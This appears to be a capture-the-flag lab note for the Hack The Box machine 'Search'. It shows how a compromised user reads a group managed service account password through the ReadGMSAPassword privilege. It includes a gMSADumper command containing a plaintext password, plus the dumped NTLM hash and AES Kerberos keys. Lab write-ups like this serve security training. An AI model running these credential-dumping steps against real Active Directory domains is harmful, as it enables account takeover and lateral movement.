InfoSec LAB

ReadGMSAPassword

according to the earlier assessment, the sierra.frye user has readgmsapassword privilege over the BIR-ADFS-GMSA$ account due to the transitive membership to the ITSEC group Now that the sierra.frye user has been compromised, I will be able to proceed forward

the msds-managedpassword attribute is a special LDAP attribute that contains the gMSA password

Retrieval

Technically, it’s also possible to retrieve Kerberos secrets (AES128 and AES256), which is preferred for OPSEC 3 well-known tools can be used for the operation;

DSInternals : A PowerShell module
GMSAPasswordReader: A C# based executable
gMSADumper: A Python script

Both DSInternals and GMSAPasswordReader requires a valid session to the target system as the reading user, sierra.frye, whereas gMSADumper can be used remotely

┌──(gMSADumper)─(kali㉿kali)-[~/archive/htb/labs/search]
└─$ python3 gMSADumper/gMSADumper/gMSADumper.py -d SEARCH.HTB -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l research.search.htb
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
BIR-ADFS-GMSA$:aes256-cts-hmac-sha1-96:06e03fa99d7a99ee1e58d795dccc7065a08fe7629441e57ce463be2bc51acf38
BIR-ADFS-GMSA$:aes128-cts-hmac-sha1-96:dc4a4346f54c0df29313ff8a21151a42

Those are the Kerberos secrets in both AES128 and AES256 format as well as the NTLM hash Validation will be made by requesting for a TGT

InfoSec LAB

Explorer

Search_ReadGMSAPassword

ReadGMSAPassword

Retrieval

Interactive Graph View

Table of Contents

Backlinks